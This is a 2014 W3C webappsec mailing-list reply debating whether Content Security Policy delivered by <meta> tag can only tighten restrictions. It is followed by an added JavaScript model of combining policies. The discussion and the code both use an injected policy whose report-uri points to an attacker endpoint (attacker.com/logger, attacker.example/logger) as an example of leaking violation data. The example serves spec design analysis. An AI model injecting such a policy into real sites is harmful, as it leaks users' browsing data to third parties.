
Re: Header Policy Vs. Meta tag policy

From: Devdatta Akhawe <dev.akhawe@gmail.com>
Date: Wed, 11 Jun 2014 10:32:55 -0700
Message-ID: <CAPfop_0uOtPP+TcRLUCauKc_HHgS0J1J_eAfGV0ZyoDwbecksQ@mail.gmail.com>
To: Daniel Veditz <dveditz@mozilla.com>
Cc: Mike West <mkwst@google.com>, Kevin Hill <khill@microsoft.com>, "public-webappsec@w3.org" <public-webappsec@w3.org>
I am not sure if a meta tag policy only constrains further. Joel started a
related thread a while back [1], and I had mentioned a couple of examples
where (it seemed to me) that an injected policy could add behavior instead
of just constraining further [2]. Joel also mentioned that he was
philosophically opposed to making CSP be "only allows you to constrain

To mitigate this concern, should we try to limit what meta tag policies can
do? For example, do we want to allow an injected policy to add a new
report-uri to attacker.com/logger?


[1] http://lists.w3.org/Archives/Public/public-webappsec/2014Mar/0001.html
[2] http://lists.w3.org/Archives/Public/public-webappsec/2014Mar/0008.html
[3] http://lists.w3.org/Archives/Public/public-webappsec/2014Mar/0020.html

On 11 June 2014 09:00, Daniel Veditz <dveditz@mozilla.com> wrote:

> On 6/11/2014 12:20 AM, Mike West wrote:
>> Thanks Dan. I agree with your analysis, and I appreciate you withdrawing
>> your objection.
>> I've made this change in
>> https://github.com/w3c/webappsec/commit/f697c40eea84b6c57480c0e3783993a47ebdc3d5
>> WDYT?
> To be clear, your change does two things and we were mainly talking about
> the first:
>  * allows use of both HTTP and <meta> CSP
>  * allows use of multiple <meta> CSP
> The arguments against (and in favor of) multiple <meta> CSP are pretty
> much the same as the arguments for and against allowing a combination of
> header and <meta> policies. "It's useful, and why not since it can only
> tighten policies" vs. "Injection bug in site might be used to circumvent a
> feature whose main purpose assumes you need protection from injection
> bugs". I'm not objecting to the change, just announcing my intention to sit
> in the corner and fret about the possibility.
> -Dan Veditz
Received on Wednesday, 11 June 2014 17:33:43 UTC
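As an added illustration (not part of this thread or of any W3C text) of the combination semantics debated above, here is a small JavaScript model in which every delivered policy is enforced independently, so an extra <meta> policy can only block more loads but does attach its own report-uri to the violations it produces. Source matching is simplified, and the policies, hostnames and page origin are constructed.

```javascript
// Added model (not W3C or browser code) of a user agent applying several CSP
// policies at once: each policy is enforced on its own, so a load must satisfy
// all of them, while each policy's report-uri sees only its own violations.

// Parse "directive src src; directive src" into a Map of directive -> sources.
function parsePolicy(text) {
  const directives = new Map();
  for (const part of text.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives.set(tokens[0].toLowerCase(), tokens.slice(1));
  }
  return directives;
}

// Simplified source-expression matching: 'none', 'self', *, full origin, or host.
function sourceMatches(expr, url, pageOrigin) {
  const u = new URL(url);
  if (expr === "'none'") return false;
  if (expr === "'self'") return u.origin === pageOrigin;
  return expr === '*' || (expr.includes('://') ? u.origin === expr : u.hostname === expr);
}

// One policy allows the load if the governing directive (or default-src) lists a match.
function policyAllows(policy, directive, url, pageOrigin) {
  const sources = policy.get(directive) ?? policy.get('default-src');
  if (sources === undefined) return true; // directive absent: no restriction
  return sources.some(expr => sourceMatches(expr, url, pageOrigin));
}

// Combine all delivered policies (header and <meta>): blocked if ANY policy blocks;
// every blocking policy's report-uri receives a violation report for the load.
function evaluate(policyTexts, directive, url, pageOrigin) {
  let allowed = true;
  const reportUris = [];
  for (const text of policyTexts) {
    const policy = parsePolicy(text);
    if (!policyAllows(policy, directive, url, pageOrigin)) {
      allowed = false;
      reportUris.push(...(policy.get('report-uri') ?? []));
    }
  }
  return { allowed, reportUris };
}

// Constructed scenario: the site's own header policy plus an injected <meta> policy.
const HEADER_POLICY = "script-src 'self' https://cdn.example; report-uri /csp-report";
const INJECTED_META = "script-src 'self'; report-uri https://attacker.example/logger";
const PAGE = 'https://site.example';
```

Evaluating the site's legitimate CDN script against both policies shows the two effects side by side: the load is blocked (the injected policy only constrains further), yet the resulting violation report, which carries the blocked URL, is delivered to the injected report-uri rather than to the site's own endpoint.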
